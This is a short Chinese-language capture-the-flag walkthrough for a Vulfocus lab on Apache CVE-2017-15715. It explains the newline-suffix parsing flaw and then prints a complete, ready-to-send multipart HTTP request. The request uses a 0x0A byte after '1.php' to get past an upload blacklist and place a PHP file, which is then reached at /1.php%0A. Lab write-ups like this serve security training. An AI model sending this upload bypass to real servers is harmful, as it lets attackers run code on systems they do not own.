Vulfocus靶场 | apache文件上传CVE-2017-15715
描述
Apache(音译为阿帕奇)是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。
此漏洞的出现是由于 apache 在修复第一个后缀名解析漏洞时,用正则来匹配后缀。在解析 php 时 xxx.php\x0A 将被按照 php 后缀进行解析,导致绕过一些服务器的安全策略
漏洞复现
页面访问后一篇空白,那就直接抓包看数据
然而 没有上传页面 尝试直接 修改为POST 添加 上传文件请求
修改相应包内容:
直接上传phpinfo失败
上传1.php.x成功,说明是黑名单过滤
利用 该版本存在的漏洞进行利用尝试
修改1.php后的hex为0a
以下是修改好的,改个host直接用就行
POST / HTTP/1.1
Host: 123.58.224.8:32015
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------9552222486401230933854482358
Content-Length: 359
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------9552222486401230933854482358
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: application/octet-stream
<?php phpinfo();?>
-----------------------------9552222486401230933854482358
Content-Disposition: form-data; name="name"
1.php
-----------------------------9552222486401230933854482358--
接着访问 /1.php%0A
直接在里面找FLAG即可